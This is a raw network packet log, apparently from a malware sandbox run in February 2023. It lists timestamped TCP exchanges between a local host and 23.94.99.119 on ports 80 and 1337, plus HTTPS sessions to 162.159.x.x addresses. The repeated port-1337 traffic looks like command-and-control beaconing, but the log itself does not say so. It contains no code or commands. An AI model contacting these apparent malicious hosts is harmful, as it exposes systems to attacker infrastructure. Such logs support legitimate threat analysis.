                                                                                              Feb 3, 2023 20:40:00.662462950 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662520885 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662530899 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.662595987 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662657976 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662663937 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.662761927 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662817955 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662844896 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.662908077 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662976027 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662978888 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.663048029 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663108110 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663116932 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.663183928 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663243055 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663254023 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.663316965 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663377047 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663383961 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.663450003 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663507938 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663530111 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.663585901 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663645029 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663655043 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.663717031 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663775921 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663784027 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.663846970 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663902998 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.663914919 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.663978100 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664033890 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664047956 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.664115906 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664175034 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664190054 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.664249897 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664308071 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664321899 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.664385080 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664441109 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664454937 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.664515018 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664572954 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664583921 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.664645910 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664702892 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664716959 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.664777040 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664834976 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664850950 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.664908886 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.664994001 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.665013075 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665081024 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665134907 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665158987 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.665210962 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665271044 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665286064 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.665347099 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665405035 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665421963 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.665479898 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665538073 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665553093 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.665612936 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.665684938 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.788968086 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789030075 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789072990 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789150000 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789187908 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789186954 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789225101 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789242029 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789262056 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789297104 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789299965 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789339066 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789352894 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789377928 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789418936 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789427996 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789465904 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789504051 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789514065 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789541960 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789582014 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789618015 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789633036 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789658070 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789676905 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789695978 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789735079 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789753914 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789773941 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789829016 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789839983 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789876938 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789913893 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.789935112 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.789953947 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.790004015 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.790018082 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.790038109 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.790122032 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:01.879111052 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:01.879158974 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:01.879287004 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:01.902787924 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:01.902817011 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:01.954730988 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:01.954868078 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:01.962310076 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:01.962330103 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:01.962856054 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:02.005445004 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:02.282810926 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:02.282841921 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:02.303040028 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:02.306221008 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:02.306241989 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:02.522317886 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:02.522407055 CET44349697162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:02.522476912 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:02.538949013 CET49697443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:04.578033924 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:04.578192949 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:06.696743011 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:06.818813086 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:06.818953037 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:09.381306887 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:09.546955109 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:11.900353909 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:12.068588018 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:14.494730949 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:14.661068916 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:17.009135962 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:17.171132088 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:17.895826101 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:17.895920992 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:17.896044016 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:17.905251980 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:17.905327082 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:17.945748091 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:17.945877075 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:17.947945118 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:17.947968960 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:17.948249102 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:18.066184044 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:18.170387983 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:18.170473099 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:18.188844919 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:18.189400911 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:18.189448118 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:18.427016973 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:18.427196980 CET44349699162.159.135.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:18.427262068 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:18.431121111 CET49699443192.168.2.4162.159.135.232
                                                                                              Feb 3, 2023 20:40:19.525283098 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:19.706031084 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:20.637844086 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:20.766273975 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:20.766371965 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:22.022252083 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:22.188786983 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:23.310190916 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:23.500308037 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.119355917 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.119424105 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.119529009 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.131912947 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.131963968 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.174025059 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.174117088 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.182806969 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.182833910 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.183183908 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.245824099 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.515961885 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.516007900 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.533824921 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.552870989 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.552917004 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.555372953 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:24.730868101 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.756876945 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.756999969 CET44349701162.159.138.232192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.757138968 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:24.758652925 CET49701443192.168.2.4162.159.138.232
                                                                                              Feb 3, 2023 20:40:25.816302061 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:25.990067005 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:26.653676987 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:26.773545980 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:26.773719072 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:27.059982061 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:27.231815100 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:28.325824022 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:28.490400076 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:29.304661989 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:29.482729912 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:29.575464010 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:29.739190102 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:30.841231108 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:31.012996912 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:31.809689999 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:31.974111080 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:32.119213104 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:32.289129019 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:33.365581989 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:33.537350893 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:35.020654917 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:35.021531105 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:35.202140093 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:35.213430882 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:35.857732058 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:36.024811983 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:37.513638020 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:37.514456987 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:37.681313038 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:37.685920954 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:38.372776031 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:38.545317888 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:40.014133930 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:40.014839888 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:40.183909893 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:40.186923981 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:40.872982025 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:41.048166990 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:42.529794931 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:42.530491114 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:42.697962999 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:42.700782061 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:43.390443087 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:43.567879915 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:45.045326948 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:45.045744896 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:45.208962917 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:45.213037014 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:45.895123005 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:46.066560030 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:47.568217039 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:47.571046114 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:47.760853052 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:47.761986017 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:48.404742002 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:48.574577093 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:50.061423063 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:50.065315008 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:50.222076893 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:50.244343996 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:50.920870066 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:51.095733881 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:52.640727043 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:52.641457081 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:52.807019949 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:52.810520887 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:53.714668036 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:53.894140959 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:55.140242100 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:55.140881062 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:55.301829100 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:55.321810961 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:56.202682972 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:56.376878023 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:57.655747890 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:57.655997038 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:57.819766998 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:57.823410988 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:58.718388081 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:58.892656088 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:00.190176010 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:00.190975904 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:00.376020908 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:00.379595041 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:01.234838963 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:01.414527893 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:02.703902006 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:02.704627991 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:02.877823114 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:02.882540941 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:03.735353947 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:03.909941912 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:05.207247972 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:05.208383083 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:05.370479107 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:05.374074936 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:06.250912905 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:06.429235935 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:07.704307079 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:07.704909086 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:07.869071960 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:07.872816086 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:08.772809029 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:08.945432901 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:10.272345066 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:10.273081064 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:10.475770950 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:10.479371071 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:11.540745020 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:11.713841915 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:13.694205046 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:13.695856094 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:13.867882967 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:13.871244907 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:14.251498938 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:14.427961111 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:16.204624891 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:16.205353022 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:16.367038012 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:16.370678902 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:16.766891003 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:16.937719107 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:18.720925093 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:18.721668959 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:18.889075041 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:18.892767906 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:19.267189026 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:19.435935974 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:21.220698118 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:21.221868992 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:21.383033991 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:21.386770010 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:21.769356966 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:21.934453964 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:23.793085098 CET496981337192.168.2.423.94.99.119
